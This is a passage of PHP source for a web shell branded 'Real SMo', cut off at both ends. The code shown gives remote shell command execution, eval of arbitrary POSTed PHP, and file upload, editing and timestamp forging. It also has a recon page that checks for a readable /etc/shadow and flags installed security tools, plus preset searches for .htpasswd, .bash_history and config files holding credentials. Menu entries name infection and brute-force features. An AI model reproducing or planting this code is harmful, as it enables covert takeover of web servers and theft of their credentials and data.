transition: color 0.15s ease-in-out, background-color 0.15s ease-in-out, border-color 0.15s ease-in-out, box-shadow 0.15s ease-in-out;padding-right: 0.6em;padding-left: 0.6em;border-radius: 10rem;font-weight: 400;box-shadow: 0 0 10px #7367f0;background-color: #7367F0;cursor:pointer;}

.l1 {background-color:#10163A;}

pre {font:9pt Courier New;}

</style>

var c_ = '" . htmlspecialchars($GLOBALS['cwd']) . "';

var a_ = '" . htmlspecialchars(@$_POST['a']) ."'

var charset_ = '" . htmlspecialchars(@$_POST['charset']) ."';

var p1_ = '" . ((strpos(@$_POST['p1'],"\n")!==false)?'':htmlspecialchars($_POST['p1'],ENT_QUOTES)) ."';

var p2_ = '" . ((strpos(@$_POST['p2'],"\n")!==false)?'':htmlspecialchars($_POST['p2'],ENT_QUOTES)) ."';

var p3_ = '" . ((strpos(@$_POST['p3'],"\n")!==false)?'':htmlspecialchars($_POST['p3'],ENT_QUOTES)) ."';

var d = document;

function set(a,c,p1,p2,p3,charset) {

if(a!=null)d.mf.a.value=a;else d.mf.a.value=a_;

if(c!=null)d.mf.c.value=c;else d.mf.c.value=c_;

if(p1!=null)d.mf.p1.value=p1;else d.mf.p1.value=p1_;

if(p2!=null)d.mf.p2.value=p2;else d.mf.p2.value=p2_;

if(p3!=null)d.mf.p3.value=p3;else d.mf.p3.value=p3_;

d.mf.a.value = encrypt(d.mf.a.value,'".$_COOKIE[md5($_SERVER['HTTP_HOST'])."key"]."');

d.mf.c.value = encrypt(d.mf.c.value,'".$_COOKIE[md5($_SERVER['HTTP_HOST'])."key"]."');

d.mf.p1.value = encrypt(d.mf.p1.value,'".$_COOKIE[md5($_SERVER['HTTP_HOST'])."key"]."');

d.mf.p2.value = encrypt(d.mf.p2.value,'".$_COOKIE[md5($_SERVER['HTTP_HOST'])."key"]."');

d.mf.p3.value = encrypt(d.mf.p3.value,'".$_COOKIE[md5($_SERVER['HTTP_HOST'])."key"]."');

if(charset!=null)d.mf.charset.value=charset;else d.mf.charset.value=charset_;

}

function g(a,c,p1,p2,p3,charset) {

set(a,c,p1,p2,p3,charset);

d.mf.submit();

}

function a(a,c,p1,p2,p3,charset) {

set(a,c,p1,p2,p3,charset);

var params = 'ajax=true';

for(i=0;i<d.mf.elements.length;i++)

params += '&'+d.mf.elements[i].name+'='+encodeURIComponent(d.mf.elements[i].value);

sr('" . addslashes($_SERVER['REQUEST_URI']) ."', params);

}

function sr(url, params) {

if (window.XMLHttpRequest)

req = new XMLHttpRequest();

else if (window.ActiveXObject)

req = new ActiveXObject('Microsoft.XMLHTTP');

if (req) {

req.onreadystatechange = processReqChange;

req.open('POST', url, true);

req.setRequestHeader ('Content-Type', 'application/x-www-form-urlencoded');

req.send(params);

}

function processReqChange() {

if( (req.readyState == 4) )

if(req.status == 200) {

var reg = new RegExp(\"(\\\\d+)([\\\\S\\\\s]*)\", 'm');

var arr=reg.exec(req.responseText);

eval(arr[2].substr(0, arr[1]));

} else alert('Request error!');

}

</script>

</form>";

$freeSpace = @diskfreespace($GLOBALS['cwd']);

$totalSpace = @disk_total_space($GLOBALS['cwd']);

$totalSpace = $totalSpace?$totalSpace:1;

$release = @php_uname('r');

$kernel = @php_uname('s');

$explink = 'http://noreferer.de/?http://www.exploit-db.com/search/?action=search&description=';

if(strpos('Linux', $kernel) !== false)

$explink .= urlencode('Linux Kernel ' . substr($release,0,6));

else

$explink .= urlencode($kernel . ' ' . substr($release,0,3));

if(!function_exists('posix_getegid')) {

$user = @get_current_user();

$uid = @getmyuid();

$gid = @getmygid();

$group = "?";

} else {

$uid = @posix_getpwuid(@posix_geteuid());

$gid = @posix_getgrgid(@posix_getegid());

$user = $uid['name'];

$uid = $uid['uid'];

$group = $gid['name'];

$gid = $gid['gid'];

}

$cwd_links = '';

$path = explode("/", $GLOBALS['cwd']);

$n=count($path);

for($i=0; $i<$n-1; $i++) {

$cwd_links .= "<a href='#' onclick='g(\"FilesMan\",\"";

for($j=0; $j<=$i; $j++)

$cwd_links .= $path[$j].'/';

$cwd_links .= "\")'>".$path[$i]."/</a>";

}//--------------Real SMo--------------//

$charsets = array('UTF-8', 'Windows-1251', 'KOI8-R', 'KOI8-U', 'cp866');

$opt_charsets = '';

foreach($charsets as $dokl)

$opt_charsets .= '<option value="'.$dokl.'" '.($_POST['charset']==$dokl?'selected':'').'>'.$dokl.'</option>';

$m = array('Sec. Info'=>'SecInfo','Files'=>'FilesMan','Delivery Test'=>'Deliverytest','Console'=>'Console','Infect'=>'Infect','Sql'=>'Sql','Php'=>'Php','Safe mode'=>'SafeMode','String tools'=>'StringTools','Bruteforce'=>'Bruteforce','Network'=>'Network');

if(!empty($GLOBALS['password_shell'])){

$m['Change Password'] ='changepass';

$m['Logout'] ='Logout';

}else{$m['Shell password'] ='changepass';}

$menu = '';

foreach($m as $k => $v)

if($v == 'Deliverytest' || $v == 'changepass') {

$menu .= '<th>[ <a href="#" style="color:#ea5455 !important" onclick="g(\''.$v.'\',null,\'\',\'\',\'\')">'.$k.'</a> ]</th>';

}

else{

$menu .= '<th>[ <a href="#" onclick="g(\''.$v.'\',null,\'\',\'\',\'\')">'.$k.'</a> ]</th>';

}

$drives = "";

if ($GLOBALS['os'] == 'win') {

foreach(range('c','z') as $drive)

if (is_dir($drive.':\\'))

$drives .= '<a href="#" onclick="g(\'FilesMan\',\''.$drive.':/\')">[ '.$drive.' ]</a> ';

}

//--------------Real SMo--------------//

echo '<table style="background-color: #559;" class=info cellpadding=3 cellspacing=0 width=100%><tr style="background: #0000009e;"><td width=1><span>Uname:<br>User:<br>Php:<br>Hdd:<br>Cwd:'.($GLOBALS['os'] == 'win'?'<br>Drives:':'').'</span></td>'.

'<td><b style="display:none" id="systemshort">'.PHP_OS.'</b><nobr id="systemdet">'.substr(@php_uname(), 0, 120).'</nobr><br>'.$uid.' ( '.$user.' ) <span>Group:</span> '.$gid.' ( ' .$group. ' )<br><nobr id="systemphp">'.@phpversion().'</nobr> <span>Safe mode:</span> '.($GLOBALS['safe_mode']?'<font color= #EA5455>ON</font>':'<font color=#28C76F><b>OFF</b></font>').' <a href=# onclick="g(\'Php\',null,null,\'info\')">[ phpinfo ]</a> <span>Datetime:</span> '.date('Y-m-d H:i:s').'<br>'.viewSize($totalSpace).' <span>Free:</span> '.viewSize($freeSpace).' ('.round(100/($totalSpace/$freeSpace),2).'%)<br>'.$cwd_links.' '.viewPermsColor($GLOBALS['cwd']).' <a href=# onclick="g(\'FilesMan\',\''.$GLOBALS['home_cwd'].'\',\'\',\'\',\'\')">[ home ]</a><br>'.$drives.'</td>'.

'<td width=1 align=right><nobr><label><select onchange="g(null,null,null,null,null,this.value)">'.$opt_charsets.'</select></label><br><span>Server IP:</span><br>'.gethostbyname($_SERVER["HTTP_HOST"]).'<br><span>Client IP:</span><br>-</nobr></td></tr></table>'.

'<table style="background-color:black;" cellpadding=3 cellspacing=0 width=100%><tr>'.$menu.'</tr></table><div><br><center><a href="https://t.me/RealSMo" target = "_blank"style="font-size: 20px;font-weight: 600;color: #ea5455 !important;">Real SMo</a></center>';

}

function generateRandomString($length) {

$characters = '0123456789abcdefghijklmnopqrstuvwxyzABCDEFGHIJKLMNOPQRSTUVWXYZ';

$charactersLength = strlen($characters);

$randomString = '';

for ($i = 0; $i < $length; $i++) {

$randomString .= $characters[rand(0, $charactersLength - 1)];

}

return $randomString;

}

function hardFooter() {

$is_writable = is_writable($GLOBALS['cwd'])?" <font color='#28C76F'>[ Writeable ]</font>":" <font color=#EA5455>(Not writable)</font>";

echo "

</div>

<tr>

<td><form onsubmit=\"".( function_exists('actionFilesMan')? "g(null,this.c.value,'');":'' )."return false;\"><span>Change dir:</span><br><input class='toolsInp' type=text name=c value='" . htmlspecialchars($GLOBALS['cwd']) ."'><input type=submit value='submit'></form></td>

</tr><tr>

<td><form onsubmit=\"".( function_exists('actionFilesMan')? "g('FilesMan',null,'mkdir',this.d.value);":'' )."return false;\"><span>Make dir:</span>$is_writable<br><input class='toolsInp' type=text name=d required><input type=submit value='submit'></form></td>

<td><form onsubmit=\"".( function_exists('actionFilesTools')? "g('FilesTools',null,this.f.value,'mkfile');":'' )."return false;\"><span>Make file:</span>$is_writable<br><input class='toolsInp' type=text name=f required><input type=submit value='submit'></form></td>

</tr><tr>

<td><form onsubmit=\"".( function_exists('actionConsole')? "g('Console',null,this.c.value);":'' )."return false;\"><span>Execute:</span><br><input class='toolsInp' type=text name=c value=''><input type=submit value='submit'></form></td>

<span>Upload file:</span>$is_writable<br><input class='toolsInp' type=file name=f[] multiple><input type=submit value='submit'></form><br ></td>

</tr></table></div>

</body></html>";

}

if (!function_exists("posix_getpwuid") && (strpos($GLOBALS['disable_functions'], 'posix_getpwuid')===false)) { function posix_getpwuid($p) {return false;} }

if (!function_exists("posix_getgrgid") && (strpos($GLOBALS['disable_functions'], 'posix_getgrgid')===false)) { function posix_getgrgid($p) {return false;} }

function ex($in) {

$dokas = '';

if (function_exists('exec')) {

@exec($in,$dokas);

$dokas = @join("\n",$dokas);

} elseif (function_exists('passthru')) {

ob_start();

@passthru($in);

$dokas = ob_get_clean();

} elseif (function_exists('system')) {

ob_start();//--------------Real SMo--------------//

@system($in);

$dokas = ob_get_clean();

} elseif (function_exists('shell_exec')) {

$dokas = shell_exec($in);

} elseif (is_resource($f = @popen($in,"r"))) {

$dokas = "";

while(!@feof($f))

$dokas .= fread($f,1024);

pclose($f);

}else return "↳ Unable to execute command\n";

return ($dokas==''?"↳ Query did not return anything\n":$dokas);

}

function viewSize($s) {

if($s >= 1073741824)

return sprintf('%1.2f', $s / 1073741824 ). ' GB';

elseif($s >= 1048576)

return sprintf('%1.2f', $s / 1048576 ) . ' MB';

elseif($s >= 1024)

return sprintf('%1.2f', $s / 1024 ) . ' KB';

else

return $s . ' B';

}

function perms($p) {

if (($p & 0xC000) == 0xC000)$i = 's';

elseif (($p & 0xA000) == 0xA000)$i = 'l';

elseif (($p & 0x8000) == 0x8000)$i = '-';

elseif (($p & 0x6000) == 0x6000)$i = 'b';

elseif (($p & 0x4000) == 0x4000)$i = 'd';

elseif (($p & 0x2000) == 0x2000)$i = 'c';

elseif (($p & 0x1000) == 0x1000)$i = 'p';

else $i = 'u';

$i .= (($p & 0x0100) ? 'r' : '-');

$i .= (($p & 0x0080) ? 'w' : '-');

$i .= (($p & 0x0040) ? (($p & 0x0800) ? 's' : 'x' ) : (($p & 0x0800) ? 'S' : '-'));

$i .= (($p & 0x0020) ? 'r' : '-');

$i .= (($p & 0x0010) ? 'w' : '-');

$i .= (($p & 0x0008) ? (($p & 0x0400) ? 's' : 'x' ) : (($p & 0x0400) ? 'S' : '-'));

$i .= (($p & 0x0004) ? 'r' : '-');

$i .= (($p & 0x0002) ? 'w' : '-');

$i .= (($p & 0x0001) ? (($p & 0x0200) ? 't' : 'x' ) : (($p & 0x0200) ? 'T' : '-'));

return $i;

}//--------------Real SMo--------------////--------------Real SMo--------------//

function viewPermsColor($f) {

if (!@is_readable($f))

return '<font color=#EA5455><b>'.perms(@fileperms($f)).'</b></font>';

elseif (!@is_writable($f))

return '<font color=#EA5455><b>'.perms(@fileperms($f)).'</b></font>';

else

return '<font color=#28C76F><b>'.perms(@fileperms($f)).'</b></font>';

}

function hardScandir($dir) {

if(function_exists("scandir")) {

return scandir($dir);

} else {

$dh = opendir($dir);

while (false !== ($filename = readdir($dh)))

$files[] = $filename;

return $files;

}

function which($p) {

$path = ex('which ' . $p);

if(!empty($path))

return $path;

return false;

}

function actionRC() {

if(!@$_POST['p1']) {

$a = array(

"uname" => php_uname(),

"php_version" => phpversion(),

"VERSION" => VERSION,

"safemode" => @ini_get('safe_mode')

);

echo serialize($a);

} else {

eval($_POST['p1']);

}

}//--------------Real SMo--------------//

function prototype($k, $v) {

$_COOKIE[$k] = $v;

setcookie($k, $v);

}

function changer($p, $n) {

$passnew = changepass($p) ? $p: NULL;

$shellname = rename ($_SERVER['SCRIPT_FILENAME'], "SMoker-".$n.".php") ? "SMoker-".$n.".php" : basename($_SERVER["SCRIPT_FILENAME"]);

$dir_only = $_SERVER['HTTP_HOST'].substr($_SERVER['REQUEST_URI'], 0, strrpos($_SERVER['REQUEST_URI'], '/') + 1);

$finalshl = $dir_only.$shellname.(isset($passnew) ? "?pass=$passnew": '');

return json_encode(array('url' => $finalshl,));

}

function actionSecInfo() {

hardHeader();

echo '<h1>Server security information</h1><div class=content>';

function showSecParam($n, $v) {

$v = trim($v);

if($v) {

echo '<span>' . $n . ': </span>';

if(strpos($v, "\n") === false)

echo $v . '<br>';

else

echo '<pre class=ml1>' . $v . '</pre>';

}

showSecParam('Server software', @getenv('SERVER_SOFTWARE'));

if(function_exists('apache_get_modules'))

showSecParam('Loaded Apache modules', implode(', ', apache_get_modules()));

showSecParam('Disabled PHP Functions', $GLOBALS['disable_functions']?$GLOBALS['disable_functions']:'none');

showSecParam('Open base dir', @ini_get('open_basedir'));

showSecParam('Safe mode exec dir', @ini_get('safe_mode_exec_dir'));

showSecParam('Safe mode include dir', @ini_get('safe_mode_include_dir'));

showSecParam('cURL support', function_exists('curl_version')?'enabled':'no');

$temp=array();

if(function_exists('mysql_get_client_info'))

$temp[] = "MySql (".mysql_get_client_info().")";

if(function_exists('mssql_connect'))

$temp[] = "MSSQL";

if(function_exists('pg_connect'))

$temp[] = "PostgreSQL";

if(function_exists('oci_connect'))

$temp[] = "Oracle";

showSecParam('Supported databases', implode(', ', $temp));

echo '<br>';

if($GLOBALS['os'] == 'nix') {

showSecParam('Readable /etc/passwd', @is_readable('/etc/passwd')?"yes <a href='#' onclick='g(\"FilesTools\", \"/etc/\", \"passwd\")'>[view]</a>":'no');

showSecParam('Readable /etc/shadow', @is_readable('/etc/shadow')?"yes <a href='#' onclick='g(\"FilesTools\", \"/etc/\", \"shadow\")'>[view]</a>":'no');

showSecParam('OS version', @file_get_contents('/proc/version'));

showSecParam('Distr name', @file_get_contents('/etc/issue.net'));

if(!$GLOBALS['safe_mode']) {

$userful = array('gcc','lcc','cc','ld','make','php','perl','python','ruby','tar','gzip','bzip','bzip2','nc','locate','suidperl');

$danger = array('kav','nod32','bdcored','uvscan','sav','drwebd','clamd','rkhunter','chkrootkit','iptables','ipfw','tripwire','shieldcc','portsentry','snort','ossec','lidsadm','tcplodg','sxid','logcheck','logwatch','sysmask','zmbscap','sawmill','wormscan','ninja');

$downloaders = array('wget','fetch','lynx','links','curl','get','lwp-mirror');

echo '<br>';

$temp=array();

foreach ($userful as $dokl)

if(which($dokl))

$temp[] = $dokl;

showSecParam('Userful', implode(', ',$temp));

$temp=array();

foreach ($danger as $dokl)

if(which($dokl))

$temp[] = $dokl;

showSecParam('Danger', implode(', ',$temp));

$temp=array();

foreach ($downloaders as $dokl)

if(which($dokl))

$temp[] = $dokl;

showSecParam('Downloaders', implode(', ',$temp));

echo '<br/>';

showSecParam('HDD space', ex('df -h'));

showSecParam('Hosts', @file_get_contents('/etc/hosts'));

showSecParam('Mount options', @file_get_contents('/etc/fstab'));

}//--------------Real SMo--------------//

} else {

showSecParam('OS Version',ex('ver'));

showSecParam('Account Settings', iconv('CP866', 'UTF-8',ex('net accounts')));

showSecParam('User Accounts', iconv('CP866', 'UTF-8',ex('net user')));

}

echo '</div>';

hardFooter();

}

function actionFilesTools() {

if( isset($_POST['p1']) )

$_POST['p1'] = urldecode($_POST['p1']);

if(@$_POST['p2']=='download') {

if(@is_file($_POST['p1']) && @is_readable($_POST['p1'])) {

ob_start("ob_gzhandler", 4096);

header("Content-Disposition: attachment; filename=".basename($_POST['p1']));

if (function_exists("mime_content_type")) {

$type = @mime_content_type($_POST['p1']);

header("Content-Type: " . $type);

} else

header("Content-Type: application/octet-stream");

$fp = @fopen($_POST['p1'], "r");

if($fp) {

while(!@feof($fp))

echo @fread($fp, 1024);

fclose($fp);

}

}exit;

}

if( @$_POST['p2'] == 'mkfile' ) {

if(!file_exists($_POST['p1'])) {

$fp = @fopen($_POST['p1'], 'w');

if($fp) {

$_POST['p2'] = "edit";

fclose($fp);

}

}//--------------Real SMo--------------//

hardHeader();

echo '<h1>File tools</h1><div class=content>';

if( !file_exists(@$_POST['p1']) ) {

echo 'File not exists';

hardFooter();

return;

}

$uid = @posix_getpwuid(@fileowner($_POST['p1']));

if(!$uid) {

$uid['name'] = @fileowner($_POST['p1']);

$gid['name'] = @filegroup($_POST['p1']);

} else $gid = @posix_getgrgid(@filegroup($_POST['p1']));

echo '<span>Name:</span> <b style="color:white">'.htmlspecialchars(@basename($_POST['p1'])).'</b> <span>Size:</span> <b style="color:white">'.(is_file($_POST['p1'])?viewSize(filesize($_POST['p1'])):'-').' </b><span>Permission:</span> '.viewPermsColor($_POST['p1']).' <span>Owner/Group:</span> '.$uid['name'].'/'.$gid['name'].'<br>';

echo '<span>Create time:</span> <b style="color:white">'.date('Y-m-d H:i:s',filectime($_POST['p1'])).'</b> <span>Access time:</span> <b style="color:white">'.date('Y-m-d H:i:s',fileatime($_POST['p1'])).'</b> <span>Modify time:</span> <b style="color:white">'.date('Y-m-d H:i:s',filemtime($_POST['p1'])).'</b><br><br>';

if( empty($_POST['p2']) )

$_POST['p2'] = 'view';

if( is_file($_POST['p1']) )

$m = array('back','View', 'Highlight', 'Download', 'Hexdump', 'Edit', 'Chmod', 'Rename', 'Touch', 'Frame');

else

$m = array('Chmod', 'Rename', 'Touch');

foreach($m as $v)

echo '<a style="color:#FF9F43 !important" href=# onclick="g(null,null,\'' . urlencode($_POST['p1']) . '\',\''.strtolower($v).'\')">'.((strtolower($v)==@$_POST['p2'])?'<b>[ '.$v.' ]</b>':$v).'</a> ';

echo '<br><br>';

switch($_POST['p2']) {

case 'view':

echo '<pre class=ml1>';

$fp = @fopen($_POST['p1'], 'r');

if($fp) {

while( !@feof($fp) )

echo htmlspecialchars(@fread($fp, 1024));

@fclose($fp);

}

echo '</pre>';

break;//--------------Real SMo--------------//

case 'highlight':

if( @is_readable($_POST['p1']) ) {

echo '<div class=ml1 style="background-color: #e1e1e1;color:black;">';

$oRb = @highlight_file($_POST['p1'],true);

echo str_replace(array('<span ','</span>'), array('<font ','</font>'),$oRb).'</div>';

}

break;

case 'chmod':

if( !empty($_POST['p3']) ) {

$perms = 0;

for($i=strlen($_POST['p3'])-1;$i>=0;--$i)

$perms += (int)$_POST['p3'][$i]*pow(8, (strlen($_POST['p3'])-$i-1));

if(!@chmod($_POST['p1'], $perms))

echo 'Can\'t set permissions!<br><script>document.mf.p3.value="";</script>';

}

clearstatcache();

echo '<script>p3_="";</script><form onsubmit="g(null,null,\'' . urlencode($_POST['p1']) . '\',null,this.chmod.value);return false;"><input type=text name=chmod value="'.substr(sprintf('%o', fileperms($_POST['p1'])),-4).'"><input type=submit value="submit"></form>';

break;

case 'edit':

if( !is_writable($_POST['p1'])) {

echo 'File isn\'t writeable';

break;

}

if( !empty($_POST['p3']) ) {

$time = @filemtime($_POST['p1']);

$_POST['p3'] = substr($_POST['p3'],1);

$fp = @fopen($_POST['p1'],"w");

if($fp) {

@fwrite($fp,$_POST['p3']);

@fclose($fp);

echo '<b style="color:#28C76F !important">Saved!<b><br><script>p3_="";</script>';

@touch($_POST['p1'],$time,$time);

}

echo '<form onsubmit="g(null,null,\'' . urlencode($_POST['p1']) . '\',null,\'1\'+this.text.value);return false;"><textarea name=text class=bigarea>';

$fp = @fopen($_POST['p1'], 'r');

if($fp) {//--------------Real SMo--------------//

while( !@feof($fp) )

echo htmlspecialchars(@fread($fp, 1024));

@fclose($fp);

}

echo '</textarea><input type=submit value="submit"></form>';

break;//--------------Real SMo--------------//

case 'hexdump':

$c = @file_get_contents($_POST['p1']);

$n = 0;

$h = array('00000000<br>','','');

$len = strlen($c);

for ($i=0; $i<$len; ++$i) {

$h[1] .= sprintf('%02X',ord($c[$i])).' ';

switch ( ord($c[$i]) ) {

case 0: $h[2] .= ' '; break;

case 9: $h[2] .= ' '; break;

case 10: $h[2] .= ' '; break;

case 13: $h[2] .= ' '; break;

default: $h[2] .= $c[$i]; break;

}

$n++;

if ($n == 32) {

$n = 0;

if ($i+1 < $len) {$h[0] .= sprintf('%08X',$i+1).'<br>';}

$h[1] .= '<br>';

$h[2] .= "\n";

}

echo '<table cellspacing=1 cellpadding=5 bgcolor=#222><tr><td bgcolor=#202832><span style="font-weight: normal;"><pre>'.$h[0].'</pre></span></td><td bgcolor=#060a10><pre>'.$h[1].'</pre></td><td bgcolor=#202832><pre>'.htmlspecialchars($h[2]).'</pre></td></tr></table>';

break;

case 'rename':

if( !empty($_POST['p3']) ) {

if(!@rename($_POST['p1'], $_POST['p3']))

echo 'Can\'t rename!<br>';

else

die('<script>g(null,null,"'.urlencode($_POST['p3']).'",null,"")</script>');

}

echo '<form onsubmit="g(null,null,\'' . urlencode($_POST['p1']) . '\',null,this.name.value);return false;"><input type=text name=name value="'.htmlspecialchars($_POST['p1']).'"><input type=submit value="submit"></form>';

break;

case 'back':

die('<script>g(\'FilesMan\',null,\'\',\'\',\'\');</script>');

break;

case 'touch':

if( !empty($_POST['p3']) ) {

$time = strtotime($_POST['p3']);

if($time) {

if(!touch($_POST['p1'],$time,$time))

echo 'Fail!';

else

echo 'Touched!';

} else echo 'Bad time format!';

}

clearstatcache();

echo '<script>p3_="";</script><form onsubmit="g(null,null,\'' . urlencode($_POST['p1']) . '\',null,this.touch.value);return false;"><input type=text name=touch value="'.date("Y-m-d H:i:s", @filemtime($_POST['p1'])).'"><input type=submit value="submit"></form>';

break;

//--------------Real SMo--------------//

case 'frame':

$frameSrc = substr(htmlspecialchars($GLOBALS['cwd']), strlen(htmlspecialchars($_SERVER['DOCUMENT_ROOT'])));

if ($frameSrc[0] != '/')

$frameSrc = '/' . $frameSrc;

if ($frameSrc[strlen($frameSrc) - 1] != '/')

$frameSrc = $frameSrc . '/';

$frameSrc = $frameSrc . htmlspecialchars($_POST['p1']);

echo '<iframe width="100%" height="900px" scrolling="no" src='.$frameSrc.' onload="onload=height=contentDocument.body.scrollHeight"></iframe>';

break;

}

echo '</div>';

hardFooter();

}

if($os == 'win')

$aliases = array(

"List Directory" => "dir",

"Find index.php in current dir" => "dir /s /w /b index.php",

"Find *config*.php in current dir" => "dir /s /w /b *config*.php",

"Show active connections" => "netstat -an",

"Show running services" => "net start",

"User accounts" => "net user",

"Show computers" => "net view",

"ARP Table" => "arp -a",

"IP Configuration" => "ipconfig /all"

);

else//--------------Real SMo--------------//

$aliases = array(

"List dir" => "ls -lha",

"list file attributes on a Linux second extended file system" => "lsattr -va",

"show opened ports" => "netstat -an | grep -i listen",

"process status" => "ps aux",

"Find" => "",

"find all suid files" => "find / -type f -perm -04000 -ls",

"find suid files in current dir" => "find . -type f -perm -04000 -ls",

"find all sgid files" => "find / -type f -perm -02000 -ls",

"find sgid files in current dir" => "find . -type f -perm -02000 -ls",

"find config.inc.php files" => "find / -type f -name config.inc.php",

"find config* files" => "find / -type f -name \"config*\"",

"find config* files in current dir" => "find . -type f -name \"config*\"",

"find all writable folders and files" => "find / -perm -2 -ls",

"find all writable folders and files in current dir" => "find . -perm -2 -ls",

"find all service.pwd files" => "find / -type f -name service.pwd",

"find service.pwd files in current dir" => "find . -type f -name service.pwd",

"find all .htpasswd files" => "find / -type f -name .htpasswd",

"find .htpasswd files in current dir" => "find . -type f -name .htpasswd",

"find all .bash_history files" => "find / -type f -name .bash_history",

"find .bash_history files in current dir" => "find . -type f -name .bash_history",

"find all .fetchmailrc files" => "find / -type f -name .fetchmailrc",

"find .fetchmailrc files in current dir" => "find . -type f -name .fetchmailrc",

"Locate" => "",//--------------Real SMo--------------////--------------Real SMo--------------//

"locate httpd.conf files" => "locate httpd.conf",

"locate vhosts.conf files" => "locate vhosts.conf",

"locate proftpd.conf files" => "locate proftpd.conf",

"locate psybnc.conf files" => "locate psybnc.conf",

"locate my.conf files" => "locate my.conf",

"locate admin.php files" =>"locate admin.php",

"locate cfg.php files" => "locate cfg.php",

"locate conf.php files" => "locate conf.php",

"locate config.dat files" => "locate config.dat",

"locate config.php files" => "locate config.php",

"locate config.inc files" => "locate config.inc",

"locate config.inc.php" => "locate config.inc.php",

"locate config.default.php files" => "locate config.default.php",

"locate config* files " => "locate config",

"locate .conf files"=>"locate '.conf'",

"locate .pwd files" => "locate '.pwd'",

"locate .sql files" => "locate '.sql'",

"locate .htpasswd files" => "locate '.htpasswd'",

"locate .bash_history files" => "locate '.bash_history'",

"locate .mysql_history files" => "locate '.mysql_history'",

"locate .fetchmailrc files" => "locate '.fetchmailrc'",

"locate backup files" => "locate backup",

"locate dump files" => "locate dump",

"locate priv files" => "locate priv"

);

function actionConsole() {

if(!empty($_POST['p1']) && !empty($_POST['p2'])) {

prototype(md5($_SERVER['HTTP_HOST']).'stderr_to_out', true);

$_POST['p1'] .= ' 2>&1';

} elseif(!empty($_POST['p1']))

prototype(md5($_SERVER['HTTP_HOST']).'stderr_to_out', 0);

if(isset($_POST['ajax'])) {

prototype(md5($_SERVER['HTTP_HOST']).'ajax', true);

ob_start();//--------------Real SMo--------------//

echo "d.cf.cmd.value='';\n";

$temp = @iconv($_POST['charset'], 'UTF-8', addcslashes("\n$ ".$_POST['p1']."\n".ex($_POST['p1']),"\n\r\t\'\0"));

if(preg_match("!.*cd\s+([^;]+)$!",$_POST['p1'],$match)) {

if(@chdir($match[1])) {

$GLOBALS['cwd'] = @getcwd();

echo "c_='".$GLOBALS['cwd']."';";

}

echo "d.cf.output.value+='".$temp."';";

echo "d.cf.output.scrollTop = d.cf.output.scrollHeight;";

$temp = ob_get_clean();

echo strlen($temp), "\n", $temp;

exit;

}

if(empty($_POST['ajax'])&&!empty($_POST['p1']))

prototype(md5($_SERVER['HTTP_HOST']).'ajax', 0);

hardHeader();

echo "<script>

if(window.Event) window.captureEvents(Event.KEYDOWN);

var cmds = new Array('');

var cur = 0;

function kp(e) {

var n = (window.Event) ? e.which : e.keyCode;

if(n == 38) {

cur--;

if(cur>=0)

document.cf.cmd.value = cmds[cur];

else

cur++;

} else if(n == 40) {

cur++;

if(cur < cmds.length)

document.cf.cmd.value = cmds[cur];

else

cur--;

}

function add(cmd) {

cmds.pop();

cmds.push(cmd);

cmds.push('');

cur = cmds.length-1;

}

</script>";

echo '<h1>Console</h1><div class=content><form name=cf onsubmit="if(d.cf.cmd.value==\'clear\'){d.cf.output.value=\'\';d.cf.cmd.value=\'\';return false;}add(this.cmd.value);if(this.ajax.checked){a(null,null,this.cmd.value,this.show_errors.checked?1:\'\');}else{g(null,null,this.cmd.value,this.show_errors.checked?1:\'\');} return false;"><label><select name=alias>';

foreach($GLOBALS['aliases'] as $n => $v) {

if($v == '') {

echo '<optgroup label="-'.htmlspecialchars($n).'-"></optgroup>';

continue;

}

echo '<option value="'.htmlspecialchars($v).'">'.$n.'</option>';

}

echo '</select></label><input type=button onclick="add(d.cf.alias.value);if(d.cf.ajax.checked){a(null,null,d.cf.alias.value,d.cf.show_errors.checked?1:\'\');}else{g(null,null,d.cf.alias.value,d.cf.show_errors.checked?1:\'\');}" value="submit"> <nobr><input type=checkbox name=ajax value=1 '.(@$_COOKIE[md5($_SERVER['HTTP_HOST']).'ajax']?'checked':'').'> send using AJAX <input type=checkbox name=show_errors value=1 '.(!empty($_POST['p2'])||$_COOKIE[md5($_SERVER['HTTP_HOST']).'stderr_to_out']?'checked':'').'> redirect stderr to stdout (2>&1)</nobr><br/><textarea class=bigarea name=output style="border-bottom:0;margin-top:5px;" readonly>';

if(!empty($_POST['p1'])) {

echo htmlspecialchars("$ ".$_POST['p1']."\n".ex($_POST['p1']));

}

echo '</textarea><table style="border:1px solid #060a10;background-color:#060a10;border-top:0px;" cellpadding=0 cellspacing=0 width="100%"><tr><td style="padding-left:4px; width:13px;">$</td><td><input type=text name=cmd style="border:0px;width:100%;" onkeydown="kp(event);"></td></tr></table>';

echo '</form></div><script>d.cf.cmd.focus();</script>';

hardFooter();

}

function actionPhp() {

if( isset($_POST['ajax']) ) {

$_COOKIE[md5($_SERVER['HTTP_HOST']).'ajax'] = true;

ob_start();

$temp = "document.getElementById('PhpOutput').style.display='';document.getElementById('PhpOutput').innerHTML='".addcslashes(htmlspecialchars(ob_get_clean()),"\n\r\t\\'\0")."';\n";

echo strlen($temp), "\n", $temp;

exit;

}

hardHeader();

if( isset($_POST['p2']) && ($_POST['p2'] == 'info') ) {

echo '<h1>PHP info</h1><div class=content>';

ob_start();

phpinfo();

$tmp = ob_get_clean();

$tmp = preg_replace('!body {.*}!msiU','',$tmp);

$tmp = preg_replace('!a:\w+ {.*}!msiU','',$tmp);

$tmp = preg_replace('!h1!msiU','h2',$tmp);

$tmp = preg_replace('!td, th {(.*)}!msiU','.e, .v, .h, .h th {$1}',$tmp);

$tmp = preg_replace('!body, td, th, h2, h2 {.*}!msiU','',$tmp);

echo $tmp;

echo '</div><br>';//--------------Real SMo--------------//

}

if(empty($_POST['ajax'])&&!empty($_POST['p1']))

$_COOKIE[md5($_SERVER['HTTP_HOST']).'ajax'] = false;

echo '<h1>Execution PHP-code</h1><div class=content><form name=pf method=post onsubmit="if(this.ajax.checked){a(null,null,this.code.value);}else{g(null,null,this.code.value,\'\');}return false;"><textarea name=code class=bigarea id=PhpCode>'.(!empty($_POST['p1'])?htmlspecialchars($_POST['p1']):'').'</textarea><input type=submit value=Eval style="margin-top:5px">';

echo ' <input type=checkbox name=ajax value=1 '.($_COOKIE[md5($_SERVER['HTTP_HOST']).'ajax']?'checked':'').'> send using AJAX</form><pre id=PhpOutput style="'.(empty($_POST['p1'])?'display:none;':'').'margin-top:5px;" class=ml1>';

if(!empty($_POST['p1'])) {

ob_start();

eval($_POST['p1']);

echo htmlspecialchars(ob_get_clean());

}

echo '</pre></div>';

hardFooter();

}

function actionFilesMan() {

